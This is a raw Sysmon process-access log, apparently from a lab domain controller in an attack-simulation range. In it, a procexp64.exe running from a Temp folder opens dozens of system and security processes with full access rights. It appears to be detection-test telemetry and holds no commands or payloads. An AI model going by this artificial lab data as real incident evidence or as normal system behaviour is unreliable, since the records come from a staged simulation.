15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791313Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791312Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791311Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791310Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791309Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791308Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791307Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791306Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791305Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791304Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791303Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791302Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791301Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791300Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791299Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791298Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791297Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791296Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791295Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791294Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791293Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791292Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791291Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791290Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791289Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791288Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791287Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791286Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791285Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791284Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791283Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791282Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791281Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791280Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791279Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791278Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791277Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791276Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 